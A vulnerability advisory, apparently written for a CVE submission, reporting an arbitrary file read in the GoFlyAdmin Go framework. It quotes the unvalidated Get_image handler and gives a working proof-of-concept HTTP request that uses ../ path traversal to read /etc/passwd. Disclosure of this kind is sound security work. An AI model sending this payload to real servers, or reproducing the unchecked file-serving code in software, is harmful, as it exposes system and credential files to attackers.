偶遇到该框架,随手挖个day,提交cve但没有具体数字版本号,未通过。
BUG_Author:
ifish
Affected version:
goflyadmin open source version
Vendor:
https://github.com/huanglishi/GoFlyAdmin
Software:
https://goflys.cn/prdetail?id=6
Vulnerability File:
/GoFlyAdmin/app/common/uploadfile.go
Vulnerability Description
A vulnerability has been discovered in GoFlyAdmin, specifically within the getimg interface, which fails to validate the input parameters. This flaw allows remote attackers to read arbitrary files from the system.
The vulnerable code is located in /GoFlyAdmin/app/common/uploadfile.go:
func (api *Uploadfile) Get_image(c *gin.Context) { imageName := c.Query("url") imgrul := strings.Split(imageName, "?") c.File(imgrul[0]) }
The Get_image function does not properly validate the url parameter, allowing attackers to supply a crafted URL to read arbitrary files from the server.
Proof of Concept (PoC)
To exploit this vulnerability, an attacker can send a request to the vulnerable endpoint with a crafted URL parameter:
GET http://127.0.0.1:8108/common/uploadfile/get_image?url=../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:8108
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
This request will cause the server to read and return the contents of the /etc/passwd file.
